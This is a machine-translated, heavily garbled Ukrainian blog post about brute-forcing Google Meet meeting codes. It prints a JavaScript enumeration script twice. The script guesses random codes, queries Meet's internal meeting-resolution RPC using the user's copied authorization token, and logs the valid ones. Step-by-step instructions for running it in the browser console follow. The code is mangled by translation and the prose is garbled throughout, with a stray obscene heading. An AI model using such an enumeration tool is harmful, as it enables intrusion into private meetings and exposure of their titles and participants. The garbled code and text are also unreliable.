Visio – застрягти в Google Meet | Дірк, Діна зустрічається – Visio

Зустріньте Вісіо

Contents

1 Зустріньте Вісіо
- 1.1 Дрочити
- 1.2 Зустріньте Вісіо

randomize = () => dico = dico.Розкол (”).Карта (значення => (< value, sort: Math.random() >)).заклинання ((a, b) => a.заклинання – б.заклинання).Карта ((< value >) => значення).Приєднатися (”),
Newpatternkey = () => “xxx-xxxx-xxx”.Розкол (”).Карта (c => c == ‘-‘?С: Рядок.від Charcode (математика.Підлога (математика.Random ()*25) +97)).Приєднатися (”),
Ключ = newpatternkey (), лічильник = 20;
Next = () => ключ.Розкол (”).Карта (e => e == ‘-‘ ? Е: Діко [Діко.Indexof (e) + 1> = dico.довжина ? 0: Діко.Indexof (e) + 1]).Приєднатися (”),
Лічильник = 0;
MeetLink = ‘https: // зустрітися.Google.com/’, доступний Toe = () => xhr = новий xmlhttprequest ();
Якщо (лічильник ++> = 20) лічильник = 0;
Key = newpatternkey ();
Рандомізувати ();
>
Ключ = наступний ();
xhr.Відкрити (‘Get’, MeetLink + ключ);
xhr.AddeVentLisner (‘навантаження’, (e) => fetch (MeetLink.concat (“/$ rpc/google.RTC.зустрічі.V1.MeetingsPaceservice/Resolewemeetingspace “),” заголовки “:” авторизація “: авторизація,
“Тип вмісту”: “Додаток/X-Protobuf”,
“X-goog-adep-ключ”: e.цільовий.відповідальність.Збіг (/\ [“https \: \/\/meet \.Google \.com \ “\,” ([A-ZA-Z0-9 \ _ \-]) “\]/) [1],
“X-goog-authuse”: “0”,
“X-goog-endode-réspose-if-secutable”: “base64”,
“X-goog-meeting-ідентифікатор”: btoa (‘\ b \ x02 \ x12 \ f’.Concat (ключ)),
>,
“Тіло”: “\ n \ f”.Concat (ключ, “0 \ U0001”),
“Метод”: “Пост”
>).Тоді (e => e.Text ())
.тоді (e => setTimeout (доступний, 100);
консоль.Журнал (MeetLink.Concat (ключ).BeautifyDisplay (38), (e.Замінити (/[^a-Za-Z0-9]/g, “”)+””).BeautifyDisplay (38));
>);
>);
xhr.Sent ();
>;
Нитка.прототип.BeautifyDisplay = функція (розмір) < let txt = this.valueOf(); return txt.concat(' '.repeat(txt.length >розмір ? TXT.Довжина: розмір)).Substr (0, розмір).Concat (‘|’); >,
консоль.Clear ();
Доступно ();
>) ()

Дрочити

В даний час працюючи в галузі кібербезпеки, я регулярно стикаюся з досить тривіальними ситуаціями.

Останнє, вторгнення людини під час зустрічі .
На щастя, для безпеки Google Meet включала функцію, що дозволяє попередити учасників, що людина прагне приєднатися до відеоконференції, а й прийняти або відмовити.

Однак ця подія змушує мене задати собі ряд питань .

Складність посилання Google Meet

Перш за все, як людина може підключитися до зустрічі, не запрошуючи на нього ?

Ми повинні розглянути простоту посилання: https: // google.зустрічатися.com/Xxx -yyy -zzzz

Xxx -yyy -zzzz є лише алфавітними символами між A і Z, тобто 27 можливі комбінації для кожного персонажа.

Для математиків, отже, є:

27 x 27 x 27 x 27 x 27 x 27 x 27 x 27 x 27 x 27 Можливі комбінації .

Тривалість життя Google Meet Link

Хоча зараз ми можемо краще зрозуміти, як побудовані посилання наших облігацій на конференції “Google Meet”, є дуже важливий аспект, який слід врахувати . Життя посилання на зустріч Google !

Дійсно, кожен може генерувати зустрічі Google зустрічей за кілька кліків.
Але через кілька днів, тижнів або місяців . Посилання вже не дійсні.

Отже, генеровані посилання мають певний період дійсності .

Виняток Зробіть “повторювані” події, і саме тут стає цікавим.
У бізнесі є багато можливостей регулярно організовувати (команда / бізнес, щоденний, щотижня, щомісяця,, . )).
Коли працівник генерує цей тип події у своєму порядку денному, автоматично генерується посилання на зустріч Google. Цей незмінний.
Тож у вас буде однакове посилання кожного разу для цієї події.

З невеликою JavaScript та грубим силою ?

З усіма цими елементами ми зараз готові підмітати всі можливості та досягти великих ймовірностей для виявлення посилань на відеоконовії !

Тож у мене є невелика ретро-застрахована робота Google Meet, щоб написати код JavaScript, який спробує нескінченну кількість комбінацій

(C) Дірк.Org 2023-2024 – Рулетка Meet’s Meet
(1) Запустіть цей сценарій на https: // google.зустрічатися.com

Нехай авторизація = “Sapisidhash xxxxxxxxxxxxxxxx_xxxxxxxxxxxxxxxxxxxxxxxxxxxxx“, dico =” abcdefghijklmnopqrstuvxz “,

randomize = () => dico = dico.Розкол (”).Карта (значення => (< value, sort: Math.random() >)).заклинання ((a, b) => a.заклинання – б.заклинання).Карта ((< value >) => значення).Приєднатися (”),
Newpatternkey = () => “xxx-xxxx-xxx”.Розкол (”).Карта (c => c == ‘-‘?С: Рядок.від Charcode (математика.Підлога (математика.Random ()*25) +97)).Приєднатися (”),
Ключ = newpatternkey (), лічильник = 20;
Next = () => ключ.Розкол (”).Карта (e => e == ‘-‘ ? Е: Діко [Діко.Indexof (e) + 1> = dico.довжина ? 0: Діко.Indexof (e) + 1]).Приєднатися (”),
Лічильник = 0;
MeetLink = ‘https: // зустрітися.Google.com/’, доступний Toe = () => xhr = новий xmlhttprequest ();
Якщо (лічильник ++> = 20) лічильник = 0;
Key = newpatternkey ();
Рандомізувати ();
>
Ключ = наступний ();
xhr.Відкрити (‘Get’, MeetLink + ключ);
xhr.AddeVentLisner (‘навантаження’, (e) => fetch (MeetLink.concat (“/$ rpc/google.RTC.зустрічі.V1.MeetingsPaceservice/Resolewemeetingspace “),” заголовки “:” авторизація “: авторизація,
“Тип вмісту”: “Додаток/X-Protobuf”,
“X-goog-adep-ключ”: e.цільовий.відповідальність.Збіг (/\ [“https \: \/\/meet \.Google \.com \ “\,” ([A-ZA-Z0-9 \ _ \-]) “\]/) [1],
“X-goog-authuse”: “0”,
“X-goog-endode-réspose-if-secutable”: “base64”,
“X-goog-meeting-ідентифікатор”: btoa (‘\ b \ x02 \ x12 \ f’.Concat (ключ)),
>,
“Тіло”: “\ n \ f”.Concat (ключ, “0 \ U0001”),
“Метод”: “Пост”
>).Тоді (e => e.Text ())
.Тоді (e =>

SetTimeout (доступний, 100);
консоль.Журнал (MeetLink.Concat (ключ).BeautifyDisplay (38), (e.Замінити (/[^a-Za-Z0-9]/g, “”)+””).BeautifyDisplay (38));
>);
>);
xhr.Sent ();
>;
Нитка.прототип.BeautifyDisplay = функція (розмір) < let txt = this.valueOf(); return txt.concat(' '.repeat(txt.length >розмір ? TXT.Довжина: розмір)).Substr (0, розмір).Concat (‘|’); >,
консоль.Clear ();
Доступно ();
>) ()

Для роботи все це буде потрібно:

Відкрийте сторінку https: // зустрітися.Google.com
Відкрийте консоль розробника
На вкладці “Мережа” фільтруйте Fetch / XHR та відновіть маркер маркера“Авторизація”
Скопіюйте та вставте вихідний код вище та поставте на місце вказане маркер.
Перевірте клавішу “Вхід” на клавіатурі.

Відновлення маркера “авторизації”:

Для цікавого, це те, як повинен виглядати результат цього сценарію в дії.
Тому ми зазначаємо рядки, які інформують нам про те, що простір для відеоконференції не існує.
Та інші, які поставили нас на знак конференції ! Тому вказівка на те, що посилання є дійсним;)

Однак не сподівайтеся, що через кілька секунд впаде на посилання на зустріч ^^
(Якщо ви трохи пощастило)
Вам потрібно буде бути чудовим терпіння, дозволяючи йому бігати не менше півгодини.

Висновок

Не панікуйте, що існує більша кількість удачі, щоб знайти дійсне посилання на зустріч Google, ніж виграш Loto.

Увага ! Людина, яка натрапляє на дійсну зустріч доступу до посилання на певну інформацію без необхідності підключення:
Назва зустрічі (тому уникайте ковзання конфіденційної інформації) та підключених учасників (усі або гра).

Зустріньте Вісіо

Інтернет -пограбування

Наклейка бестселера в Інтернеті пограбування

гравці